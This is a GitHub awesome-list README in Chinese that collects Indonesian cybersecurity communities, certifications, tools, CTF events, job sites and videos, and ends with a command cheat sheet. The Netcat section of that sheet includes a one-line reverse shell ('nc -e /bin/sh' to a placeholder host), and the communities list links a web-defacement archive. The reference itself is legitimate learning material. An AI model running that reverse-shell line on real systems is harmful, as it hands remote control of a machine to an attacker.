vtino17/awesome-id-cybersecurity

GitHub: vtino17/awesome-id-cybersecurity

为印度尼西亚专业人士和学生精心策划的网络安全综合资源导航,整合了社区、培训认证、本土工具、CTF竞赛、求职渠道及命令速查等内容。

Stars: 0 | Forks: 0

# 印度尼西亚网络安全精选 为印度尼西亚的专业人士、学生和爱好者精心策划的网络安全资源。 ## 目录 - [社区](#komunitas) - [培训与认证](#training--sertifikasi) - [印度尼西亚本土工具](#tools-buatan-indonesia) - [CTF与竞赛](#ctf--kompetisi) - [博客与媒体](#blog--media) - [工作机会](#lowongan-kerja) - [书籍与参考](#buku--referensi) - [YouTube 频道](#channel-youtube) - [免费在线课程](#kelas-online-gratis) ## 社区 | 社区 | 平台 | 描述 | |-----------|----------|-----------| | [ID-CERT](https://www.cert.or.id) | Web | 印度尼西亚计算机安全事件响应团队 | | [Indonesia Hacker](https://www.facebook.com/groups/indonesiahacker) | Facebook 群组 | 印尼最大的黑客社区 | | [Cyber Security Indonesia](https://www.facebook.com/groups/cybersecindonesia) | Facebook 群组 | 印度尼西亚网络安全讨论 | | [Komunitas Cyber Security Indonesia](https://t.me/cybersecindonesia) | Telegram | Telegram 网络安全群组 | | [Linux Indonesia](https://t.me/linux_id) | Telegram | Linux 与安全讨论 | | [DevOps Indonesia](https://t.me/devops_indonesia) | Telegram | 基础设施与云安全 | | [MikroTik Indonesia](https://www.facebook.com/groups/mikrotikindonesia) | Facebook 群组 | MikroTik 配置与安全加固 | | [Defacer.ID](https://defacer.id) | Web | 网页篡改归档与安全新闻 | ## 培训与认证 ### 全球认证 | 认证 | 等级 | 费用 | 备注 | |-------------|-------|-------|---------| | CompTIA Security+ | 入门 | $400 | 网络安全基础 | | CEH (Certified Ethical Hacker) | 中级 | $1,200 | EC-Council,在印尼很受欢迎 | | OSCP (Offensive Security) | 高级 | $1,600 | 实战渗透测试 | | CISSP | 高级 | $750 | 安全管理 | | CCNA | 入门 | $300 | 网络基础,安全的前置条件 | | AWS Security | 中级 | $150 | 云安全 | ### 本地认证 | 认证 | 机构 | 费用 | |-------------|----------|-------| | CCEP | Red Team Leaders | ~Rp 500K | | CRTOM | Red Team Leaders | ~Rp 500K | | BNSP IT Security | BNSP | ~Rp 3-5 Juta | ### 免费培训平台 - [PortSwigger Web Security Academy](https://portswigger.net/web-security) - 免费的 Web 安全实验室 - [TryHackMe](https://tryhackme.com) - 实践网络安全(免费层) - [HackTheBox](https://www.hackthebox.com) - CTF 风格的实验室 - [PicoCTF](https://picoctf.com) - 适合初学者的 CTF - [OWASP WebGoat](https://owasp.org/www-project-webgoat/) - Web 安全培训 - [PentesterLab](https://pentesterlab.com) - Web 漏洞利用练习 - [OverTheWire](https://overthewire.org) - 用于 Linux 安全的 WarGames ## 印度尼西亚本土工具 | 工具 | 作者 | 描述 | |------|--------|-----------| | [kage](https://github.com/vtino17/kage) | vtino17 | AI 驱动的安全扫描器 | | [tools](https://github.com/vtino17/tools) | vtino17 | 85+ 渗透测试工具集 | | [taskcapsule](https://github.com/vtino17/taskcapsule) | vtino17 | 任务上下文管理器 | | [mikrotik-hardening](https://github.com/vtino17/mikrotik-hardening) | vtino17 | RouterOS 安全配置 | | [wazuh-custom-decoders](https://github.com/vtino17/wazuh-custom-decoders) | vtino17 | 自定义 Wazuh SIEM 规则 | | [vuln-scanner](https://github.com/vtino17/vuln-scanner) | vtino17 | 漏洞扫描器 | | [pcap-forensics](https://github.com/vtino17/pcap-forensics) | vtino17 | PCAP 取证分析 | | [pysecnet](https://github.com/vtino17/pysecnet) | vtino17 | Python 网络库 | | [cyberlab](https://github.com/vtino17/cyberlab) | vtino17 | 一键实验室部署工具 | | [incident-response-playbooks](https://github.com/vtino17/incident-response-playbooks) | vtino17 | 应急响应手册与取证 | | [network-automation-toolkit](https://github.com/vtino17/network-automation-toolkit) | vtino17 | 多供应商网络自动化 | | [deep-mind-skill](https://github.com/vtino17/deep-mind-skill) | vtino17 | AI 批判性思维技能 | ## CTF与竞赛 ### CTF 平台 - [CTFtime](https://ctftime.org) - 全球 CTF 日程 - [HackTheBox CTF](https://ctf.hackthebox.com) - 每月 CTF - [CTF.ID](https://ctf.id) - 印度尼西亚 CTF ### 年度竞赛 | 活动 | 主办方 | 级别 | |-------|---------------|---------| | Gemastik | Kemendikbud | 国家级 | | IndoSec | ID-SIRTII | 国家级 | | Compfest | Universitas Indonesia | 国家级 | | Techcomfest | Kemendikbud | 国家级 | | FCC (Fostering Cyber Talent) | BSSN | 国家级 | ## 博客与媒体 - [OWASP Indonesia](https://owasp.org/www-chapter-indonesia/) - [ID-SIRTII](https://idsirtii.or.id) - [BSSN](https://bssn.go.id) - [PUSAD (CSIRT PENS)](https://csirt.pens.ac.id) - [Medium - Cyber Security Indonesia](https://medium.com/tag/cyber-security-indonesia) ## 分析与取证工具 | 工具 | 描述 | |------|-----------| | [Wireshark](https://wireshark.org) | 网络数据包分析器 | | [Burp Suite](https://portswigger.net/burp) | Web 安全测试 | | [Nmap](https://nmap.org) | 网络扫描器 | | [Metasploit](https://metasploit.com) | 漏洞利用框架 | | [Wazuh](https://wazuh.com) | SIEM 与 XDR | | [Velociraptor](https://github.com/Velocidex/velociraptor) | 终端可见性 | | [TheHive](https://thehive-project.org) | 应急响应平台 | | [MISP](https://misp-project.org) | 威胁情报平台 | | [YARA](https://virustotal.github.io/yara/) | 恶意软件模式匹配 | | [Volatility](https://volatilityfoundation.org) | 内存取证 | | [Autopsy](https://sleuthkit.org/autopsy/) | 磁盘取证 | | [Zeek](https://zeek.org) | 网络监控 | | [Suricata](https://suricata.io) | IDS/IPS 引擎 | | [Cuckoo Sandbox](https://cuckoosandbox.org) | 恶意软件分析 | | [Grafana](https://grafana.com) | 监控仪表盘 | | [Prometheus](https://prometheus.io) | 指标收集 | ## 工作机会 - [Glints](https://glints.com) - 筛选“Cyber Security”、“IT Security” - [LinkedIn](https://linkedin.com) - 筛选印度尼西亚地区 - [Jobstreet](https://jobstreet.co.id) - [Karir.com](https://karir.com) - [Tech in Asia Jobs](https://techinasia.com/jobs) ## 书籍与参考 ### 印尼语 - [Kuliah Gratis Cyber Security](https://www.coursera.org/professional-certificates/google-cybersecurity) - Google Cybersecurity (EN) - [Materi Cyber Security PENS](https://csirt.pens.ac.id) - [E-Book CEH Bahasa Indonesia](https://www.google.com/search?q=ceh+ebook+bahasa+indonesia) ### 英语(推荐) - The Web Application Hacker's Handbook - The Practice of Network Security Monitoring - Red Team Field Manual - Blue Team Handbook - Metasploit: The Penetration Tester's Guide ## YouTube 频道 ### 印尼语 | 频道 | 专注领域 | |---------|-------| | [Onesinus Tambunan](https://youtube.com/@onesinustambunan) | 网络、MikroTik | | [ID-Networkers](https://youtube.com/@id-networkers) | 网络工程师 | | [Kelas Network](https://youtube.com/@kelasnetwork) | 网络基础 | | [Cyber Security Indonesia](https://youtube.com/@cybersecurityindonesia) | 通用安全 | ### 英语 | 频道 | 专注领域 | |---------|-------| | [John Hammond](https://youtube.com/@johnhammond) | 恶意软件、CTF | | [IppSec](https://youtube.com/@ippsec) | HTB 攻略 | | [NetworkChuck](https://youtube.com/@networkchuck) | 网络、安全 | | [LiveOverflow](https://youtube.com/@liveoverflow) | 漏洞利用开发 | | [STÖK](https://youtube.com/@stokfredrik) | Bug bounty | ## 命令参考 ### Nmap ``` nmap -sV -sC -O target # Service + OS detection nmap -p- target # All ports scan nmap --script vuln target # Vulnerability scan nmap -sU target # UDP scan nmap -sn 10.0.0.0/24 # Ping sweep ``` ### Netcat ``` nc -lvnp 4444 # Listen on port nc -vn 10.0.0.1 22 # Connect to port nc -e /bin/sh 10.0.0.1 4444 # Reverse shell ``` ### tcpdump ``` tcpdump -i eth0 # Capture interface tcpdump -i eth0 port 80 # HTTP traffic tcpdump -i eth0 host 10.0.0.1 # Host traffic tcpdump -w capture.pcap # Write to file ``` ### Linux 安全 ``` sudo ss -tlnp # Listening ports sudo netstat -tulpn # Connection status sudo iptables -L -n # Firewall rules sudo journalctl -xe # System logs sudo fail2ban-client status # Brute force status sudo rkhunter --check # Rootkit scan ``` ### Windows 安全 ``` Get-EventLog -LogName Security -Newest 100 Get-Process | Where-Object {$_.Path -like "*temp*"} netstat -ano | findstr LISTEN wevtutil qe Security /c:10 /rd:true /e:true ``` ## 免费在线课程 | 平台 | 课程 | 时长 | |----------|--------|--------| | [Coursera](https://coursera.org) | Google Cybersecurity | 6 个月 | | [Cybrary](https://cybrary.it) | CompTIA Security+ | 自定进度 | | [PicoCTF](https://picoctf.com) | 学习 CTF | 自定进度 | | [OWASP](https://owasp.org) | Web 安全测试指南 | 自定进度 | | [TryHackMe](https://tryhackme.com) | 完全新手 | 20 小时 | | [PortSwigger](https://portswigger.net) | Web Security Academy | 自定进度 | **由 [Valentino Saputra](https://github.com/vtino17) 维护** — 欢迎通过 PR 贡献。 *最后更新:2026 年 7 月*
标签:CTI, 逆向工具, 防御加固